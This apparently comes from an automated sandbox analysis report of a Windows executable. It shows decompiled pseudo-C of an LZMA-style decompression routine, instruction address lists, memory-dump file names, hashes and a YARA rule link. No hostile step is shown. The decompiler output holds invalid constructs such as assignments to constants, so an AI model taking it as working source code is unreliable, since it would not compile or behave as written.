										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												goto L144;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											goto L130;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											L140:
											 *(_t612 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L121;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											goto L145;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											goto L149;
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L120:
												_t394 = __ebp - 0x2c;
												 *_t394 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t394;
												L121:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t401 = __ebp - 0x60;
												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t401;
												goto L124;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L103:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L109:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L113:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t392 = __ebp - 0x2c;
														 *_t392 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t392;
														goto L120;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L112:
														_t369 = __ebp - 0x48;
														 *_t369 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t369;
														goto L113;
													} else {
														goto L110;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L102:
													_t339 = __ebp - 0x48;
													 *_t339 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t339;
													goto L103;
												} else {
													goto L100;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L109;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L124:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t415 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t415;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t415;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											L170:
											_push(0x22);
											_pop(_t567);
											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
											_t535 = 0;
											L172:
											return _t535;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
						__eax =  *(__ebp - 0x50);
						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
						__eax =  *(__ebp - 0x58);
						__esi = __edx + __eax;
						 *(__ebp - 0x54) = __esi;
						__ax =  *__esi;
						__edi = __ax & 0x0000ffff;
						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
						if( *(__ebp - 0xc) >= __ecx) {
							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
							__cx = __ax;
							__cx = __ax >> 5;
							__eax = __eax - __ecx;
							__edx = __edx + 1;
							 *__esi = __ax;
							 *(__ebp - 0x50) = __edx;
						} else {
							 *(__ebp - 0x10) = __ecx;
							0x800 = 0x800 - __edi;
							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
							 *__esi = __cx;
						}
						if( *(__ebp - 0x10) >= 0x1000000) {
							goto L148;
						} else {
							goto L146;
						}
					}
					goto L1;
				}
			}








              0x00000000
              0x00407291
              0x00407291
              0x00407295
              0x004072ba
              0x004072c4
              0x00000000
              0x00407297
              0x00407297
              0x0040729a
              0x0040729e
              0x004072a1
              0x004072a4
              0x004072a8
              0x004072a8
              0x004072ab
              0x00407385
              0x00407385
              0x0040738c
              0x0040738c
              0x0040738f
              0x00407396
              0x004073c3
              0x004073c7
              0x00407427
              0x0040742a
              0x0040742f
              0x00407430
              0x00407432
              0x00407434
              0x00407437
              0x00407343
              0x00407343
              0x00407343
              0x00406adf
              0x00406adf
              0x00406adf
              0x00406ae8
              0x00000000
              0x00000000
              0x00406aee
              0x00000000
              0x00406af9
              0x00000000
              0x00000000
              0x00406b02
              0x00406b05
              0x00406b08
              0x00406b0c
              0x00000000
              0x00000000
              0x00406b12
              0x00406b15
              0x00406b17
              0x00406b18
              0x00406b1b
              0x00406b1d
              0x00406b1e
              0x00406b20
              0x00406b23
              0x00406b28
              0x00406b2d
              0x00406b36
              0x00406b49
              0x00406b4c
              0x00406b58
              0x00406b80
              0x00406b82
              0x00406b90
              0x00406b90
              0x00406b94
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00406b84
              0x00406b84
              0x00406b87
              0x00406b88
              0x00406b88
              0x00000000
              0x00406b84
              0x00406b5e
              0x00406b63
              0x00406b63
              0x00406b6c
              0x00406b74
              0x00406b77
              0x00000000
              0x00406b7d
              0x00406b7d
              0x00000000
              0x00406b7d
              0x00000000
              0x00406b9a
              0x00406b9a
              0x00406b9e
              0x0040744a
              0x00000000
              0x0040744a
              0x00406ba7
              0x00406bb7
              0x00406bba
              0x00406bbd
              0x00406bbd
              0x00406bbd
              0x00406bc0
              0x00406bc4
              0x00000000
              0x00000000
              0x00406bc6
              0x00406bcc
              0x00406bf6
              0x00406bfc
              0x00406c03
              0x00000000
              0x00406c03
              0x00406bd2
              0x00406bd5
              0x00406bda
              0x00406bda
              0x00406be5
              0x00406bed
              0x00406bf0
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00406c35
              0x00406c3b
              0x00406c3e
              0x00406c4b
              0x00406c53
              0x00000000
              0x00000000
              0x00406c0a
              0x00406c0a
              0x00406c0e
              0x00407459
              0x00000000
              0x00407459
              0x00406c1a
              0x00406c25
              0x00406c25
              0x00406c25
              0x00406c28
              0x00406c2b
              0x00406c2e
              0x00406c33
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x004072ca
              0x004072ca
              0x004072d0
              0x004072d6
              0x004072dc
              0x004072f6
              0x004072f9
              0x004072ff
              0x0040730a
              0x0040730a
              0x0040730c
              0x004072de
              0x004072de
              0x004072ed
              0x004072f1
              0x004072f1
              0x00407316
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00407318
              0x0040731c
              0x004074cb
              0x00000000
              0x004074cb
              0x00407328
              0x0040732f
              0x00407337
              0x0040733a
              0x0040733d
              0x0040733d
              0x00000000
              0x00000000
              0x00406c5b
              0x00406c5d
              0x00406c60
              0x00406cd1
              0x00406cd4
              0x00406cd7
              0x00406cde
              0x00406ce8
              0x00000000
              0x00406ce8
              0x00406c62
              0x00406c66
              0x00406c69
              0x00406c6b
              0x00406c6e
              0x00406c71
              0x00406c73
              0x00406c76
              0x00406c78
              0x00406c7d
              0x00406c80
              0x00406c83
              0x00406c87
              0x00406c8e
              0x00406c91
              0x00406c98
              0x00406c9c
              0x00406ca4
              0x00406ca4
              0x00406ca4
              0x00406c9e
              0x00406c9e
              0x00406c9e
              0x00406c93
              0x00406c93
              0x00406c93
              0x00406ca8
              0x00406cab
              0x00406cc9
              0x00406ccb
              0x00000000
              0x00406cad
              0x00406cad
              0x00406cb0
              0x00406cb3
              0x00406cb6
              0x00406cb8
              0x00406cb8
              0x00406cb8
              0x00406cbb
              0x00406cbe
              0x00406cc0
              0x00406cc1
              0x00406cc4
              0x00000000
              0x00406cc4
              0x00000000
              0x00406efa
              0x00406efe
              0x00406f1c
              0x00406f1f
              0x00406f26
              0x00406f29
              0x00406f2c
              0x00406f2f
              0x00406f32
              0x00406f35
              0x00406f37
              0x00406f3e
              0x00406f3f
              0x00406f41
              0x00406f44
              0x00406f47
              0x00406f4a
              0x00406f4a
              0x00406f4f
              0x00000000
              0x00406f4f
              0x00406f00
              0x00406f03
              0x00406f06
              0x00406f10
              0x00000000
              0x00000000
              0x00406f64
              0x00406f68
              0x00406f8b
              0x00406f8e
              0x00406f91
              0x00406f9b
              0x00406f6a
              0x00406f6a
              0x00406f6d
              0x00406f70
              0x00406f73
              0x00406f80
              0x00406f83
              0x00406f83
              0x00000000
              0x00000000
              0x00406fa7
              0x00406fab
              0x00000000
              0x00000000
              0x00406fb1
              0x00406fb5
              0x00000000
              0x00000000
              0x00406fbb
              0x00406fbd
              0x00406fc1
              0x00406fc1
              0x00406fc4
              0x00406fc8
              0x00000000
              0x00000000
              0x00407018
              0x0040701c
              0x00407023
              0x00407026
              0x00407029
              0x00407033
              0x00000000
              0x00407033
              0x0040701e
              0x00000000
              0x00000000
              0x0040703f
              0x00407043
              0x0040704a
              0x0040704d
              0x00407050
              0x00407045
              0x00407045
              0x00407045
              0x00407053
              0x00407056
              0x00407059
              0x00407059
              0x0040705c
              0x0040705f
              0x00407062
              0x00407062
              0x00407065
              0x0040706c
              0x00407071
              0x00000000
              0x00000000
              0x004070ff
              0x004070ff
              0x00407103
              0x004074a1
              0x00000000
              0x004074a1
              0x00407109
              0x0040710c
              0x0040710f
              0x00407113
              0x00407116
              0x0040711c
              0x0040711e
              0x0040711e
              0x0040711e
              0x00407121
              0x00407124
              0x00000000
              0x00000000
              0x00406cf4
              0x00406cf4
              0x00406cf8
              0x00407465
              0x00000000
              0x00407465
              0x00406cfe
              0x00406d01
              0x00406d04
              0x00406d08
              0x00406d0b
              0x00406d11
              0x00406d13
              0x00406d13
              0x00406d13
              0x00406d16
              0x00406d19
              0x00406d19
              0x00406d1c
              0x00406d1f
              0x00000000
              0x00000000
              0x00406d25
              0x00406d2b
              0x00000000
              0x00000000
              0x00406d31
              0x00406d31
              0x00406d35
              0x00406d38
              0x00406d3b
              0x00406d3e
              0x00406d41
              0x00406d42
              0x00406d45
              0x00406d47
              0x00406d4d
              0x00406d50
              0x00406d53
              0x00406d56
              0x00406d59
              0x00406d5c
              0x00406d5f
              0x00406d7b
              0x00406d7e
              0x00406d81
              0x00406d84
              0x00406d8b
              0x00406d8f
              0x00406d91
              0x00406d95
              0x00406d61
              0x00406d61
              0x00406d65
              0x00406d6d
              0x00406d72
              0x00406d74
              0x00406d76
              0x00406d76
              0x00406d98
              0x00406d9f
              0x00406da2
              0x00000000
              0x00406da8
              0x00000000
              0x00406da8
              0x00000000
              0x00406dad
              0x00406dad
              0x00406db1
              0x00407471
              0x00000000
              0x00407471
              0x00406db7
              0x00406dba
              0x00406dbd
              0x00406dc1
              0x00406dc4
              0x00406dca
              0x00406dcc
              0x00406dcc
              0x00406dcc
              0x00406dcf
              0x00406dd2
              0x00406dd2
              0x00406dd2
              0x00406dd8
              0x00000000
              0x00000000
              0x00406dda
              0x00406ddd
              0x00406de0
              0x00406de3
              0x00406de6
              0x00406de9
              0x00406dec
              0x00406def
              0x00406df2
              0x00406df5
              0x00406df8
              0x00406e10
              0x00406e13
              0x00406e16
              0x00406e19
              0x00406e19
              0x00406e1c
              0x00406e20
              0x00406e22
              0x00406dfa
              0x00406dfa
              0x00406e02
              0x00406e07
              0x00406e09
              0x00406e0b
              0x00406e0b
              0x00406e25
              0x00406e2c
              0x00406e2f
              0x00000000
              0x00406e31
              0x00000000
              0x00406e31
              0x00406e2f
              0x00406e36
              0x00406e36
              0x00406e36
              0x00406e36
              0x00000000
              0x00000000
              0x00406e71
              0x00406e71
              0x00406e75
              0x0040747d
              0x00000000
              0x0040747d
              0x00406e7b
              0x00406e7e
              0x00406e81
              0x00406e85
              0x00406e88
              0x00406e8e
              0x00406e90
              0x00406e90
              0x00406e90
              0x00406e93
              0x00406e96
              0x00406e96
              0x00406e9c
              0x00406e3a
              0x00406e3a
              0x00406e3d
              0x00000000
              0x00406e3d
              0x00406e9e
              0x00406e9e
              0x00406ea1
              0x00406ea4
              0x00406ea7
              0x00406eaa
              0x00406ead
              0x00406eb0
              0x00406eb3
              0x00406eb6
              0x00406eb9
              0x00406ebc
              0x00406ed4
              0x00406ed7
              0x00406eda
              0x00406edd
              0x00406edd
              0x00406ee0
              0x00406ee4
              0x00406ee6
              0x00406ebe
              0x00406ebe
              0x00406ec6
              0x00406ecb
              0x00406ecd
              0x00406ecf
              0x00406ecf
              0x00406ee9
              0x00406ef0
              0x00406ef3
              0x00000000
              0x00406ef5
              0x00000000
              0x00406ef5
              0x00000000
              0x00407182
              0x00407182
              0x00407186
              0x004074ad
              0x00000000
              0x004074ad
              0x0040718c
              0x0040718f
              0x00407192
              0x00407196
              0x00407199
              0x0040719f
              0x004071a1
              0x004071a1
              0x004071a1
              0x004071a4
              0x00000000
              0x00000000
              0x00406f52
              0x00406f52
              0x00406f55
              0x004072c7
              0x004072c7
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x0040734e
              0x00407352
              0x00407370
              0x00407370
              0x00407370
              0x00407377
              0x0040737e
              0x00000000
              0x0040737e
              0x00407354
              0x00407357
              0x0040735a
              0x0040735d
              0x00407364
              0x00000000
              0x00000000
              0x0040743f
              0x00407442
              0x00407343
              0x00407343
              0x00000000
              0x00000000
              0x00407079
              0x0040707b
              0x00407082
              0x00407083
              0x00407085
              0x00407088
              0x00000000
              0x00000000
              0x00407090
              0x00407093
              0x00407096
              0x00407098
              0x0040709a
              0x0040709a
              0x0040709b
              0x0040709e
              0x004070a5
              0x004070a8
              0x004070b6
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x0040739b
              0x0040739b
              0x0040739f
              0x004074d7
              0x00000000
              0x004074d7
              0x004073a5
              0x004073a8
              0x004073ab
              0x004073af
              0x004073b2
              0x004073b8
              0x004073ba
              0x004073ba
              0x004073ba
              0x004073bd
              0x004073c0
              0x004073c0
              0x004073c0
              0x004073c0
              0x00000000
              0x00000000
              0x004070be
              0x004070c1
              0x004070f7
              0x00407227
              0x00407227
              0x00407227
              0x00407227
              0x0040722a
              0x0040722a
              0x0040722d
              0x0040722f
              0x004074b9
              0x00000000
              0x004074b9
              0x00407235
              0x00407238
              0x00000000
              0x00000000
              0x0040723e
              0x00407242
              0x00407245
              0x00407245
              0x00407245
              0x00000000
              0x00407245
              0x004070c3
              0x004070c5
              0x004070c7
              0x004070c9
              0x004070cc
              0x004070cd
              0x004070cf
              0x004070d1
              0x004070d4
              0x004070d7
              0x004070ed
              0x004070f2
              0x0040712a
              0x0040712a
              0x0040712e
              0x0040715a
              0x0040715c
              0x00407163
              0x00407166
              0x00407169
              0x00407169
              0x0040716e
              0x0040716e
              0x00407170
              0x00407173
              0x0040717a
              0x0040717d
              0x004071aa
              0x004071aa
              0x004071ad
              0x004071b0
              0x00407224
              0x00407224
              0x00407224
              0x00000000
              0x00407224
              0x004071b2
              0x004071b8
              0x004071bb
              0x004071be
              0x004071c1
              0x004071c4
              0x004071c7
              0x004071ca
              0x004071cd
              0x004071d0
              0x004071d3
              0x004071ec
              0x004071ee
              0x004071f1
              0x004071f2
              0x004071f5
              0x004071f7
              0x004071fa
              0x004071fc
              0x004071fe
              0x00407201
              0x00407203
              0x00407206
              0x0040720a
              0x0040720c
              0x0040720c
              0x0040720d
              0x00407210
              0x00407213
              0x004071d5
              0x004071d5
              0x004071dd
              0x004071e2
              0x004071e4
              0x004071e7
              0x004071e7
              0x00407216
              0x0040721d
              0x004071a7
              0x004071a7
              0x004071a7
              0x004071a7
              0x00000000
              0x0040721f
              0x00000000
              0x0040721f
              0x0040721d
              0x00407130
              0x00407133
              0x00407135
              0x00407138
              0x0040713b
              0x0040713e
              0x00407140
              0x00407143
              0x00407146
              0x00407146
              0x00407149
              0x00407149
              0x0040714c
              0x00407153
              0x00407127
              0x00407127
              0x00407127
              0x00407127
              0x00000000
              0x00407155
              0x00000000
              0x00407155
              0x00407153
              0x004070d9
              0x004070dc
              0x004070de
              0x004070e1
              0x00000000
              0x00000000
              0x00406e40
              0x00406e40
              0x00406e44
              0x00407489
              0x00000000
              0x00407489
              0x00406e4a
              0x00406e4d
              0x00406e50
              0x00406e53
              0x00406e56
              0x00406e59
              0x00406e5c
              0x00406e5e
              0x00406e61
              0x00406e64
              0x00406e67
              0x00406e69
              0x00406e69
              0x00406e69
              0x00000000
              0x00000000
              0x00406fcb
              0x00406fcb
              0x00406fcf
              0x00407495
              0x00000000
              0x00407495
              0x00406fd5
              0x00406fd8
              0x00406fdb
              0x00406fde
              0x00406fe0
              0x00406fe0
              0x00406fe0
              0x00406fe3
              0x00406fe6
              0x00406fe9
              0x00406fec
              0x00406fef
              0x00406ff2
              0x00406ff3
              0x00406ff5
              0x00406ff5
              0x00406ff5
              0x00406ff8
              0x00406ffb
              0x00406ffe
              0x00407001
              0x00407001
              0x00407001
              0x00407004
              0x00407006
              0x00407006
              0x00000000
              0x00000000
              0x00407248
              0x00407248
              0x00407248
              0x0040724c
              0x00000000
              0x00000000
              0x00407252
              0x00407255
              0x00407258
              0x0040725b
              0x0040725d
              0x0040725d
              0x0040725d
              0x00407260
              0x00407263
              0x00407266
              0x00407269
              0x0040726c
              0x0040726f
              0x00407270
              0x00407272
              0x00407272
              0x00407272
              0x00407275
              0x00407278
              0x0040727b
              0x0040727e
              0x00407281
              0x00407285
              0x00407287
              0x0040728a
              0x00000000
              0x0040728c
              0x00407009
              0x00407009
              0x00000000
              0x00407009
              0x0040728a
              0x004074bf
              0x004074e1
              0x004074e7
              0x004074e9
              0x004074f0
              0x004074f2
              0x004074f9
              0x004074fd
              0x00000000
              0x00406aee
              0x004074f6
              0x004074f6
              0x00000000
              0x004074f6
              0x00407343
              0x004073c9
              0x004073cf
              0x004073d2
              0x004073d5
              0x004073d8
              0x004073db
              0x004073de
              0x004073e1
              0x004073e4
              0x004073ea
              0x00407403
              0x00407406
              0x00407409
              0x0040740c
              0x00407410
              0x00407412
              0x00407413
              0x00407416
              0x004073ec
              0x004073ec
              0x004073f4
              0x004073f9
              0x004073fb
              0x004073fe
              0x004073fe
              0x00407420
              0x00000000
              0x00407422
              0x00000000
              0x00407422
              0x00407420
              0x00000000
              0x00407295

              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.665292449.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665364092.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665378913.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665383681.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665411947.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665438070.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665452320.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665456458.0000000000437000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665468957.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 5f17471a99a701cf31c58911c016ae07bdee3b17eca89a89cbbe770d5c4f1181
              • Instruction ID: 5a24a20e97f266d7e3441ea32a969c72ce760fd7697c8a443cfa4f07d4855531
              • Opcode Fuzzy Hash: 5f17471a99a701cf31c58911c016ae07bdee3b17eca89a89cbbe770d5c4f1181
              • Instruction Fuzzy Hash: 6F911170D04229CBEF28CF98C854BADBBB1FB44305F14816ED856BB291C7786A86DF45
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00406FA7, Relevance: 5.2, APIs: 4, Instructions: 205COMMON
              Download Yara Rule
              C-Code - Quality: 98%
              			E00406FA7() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
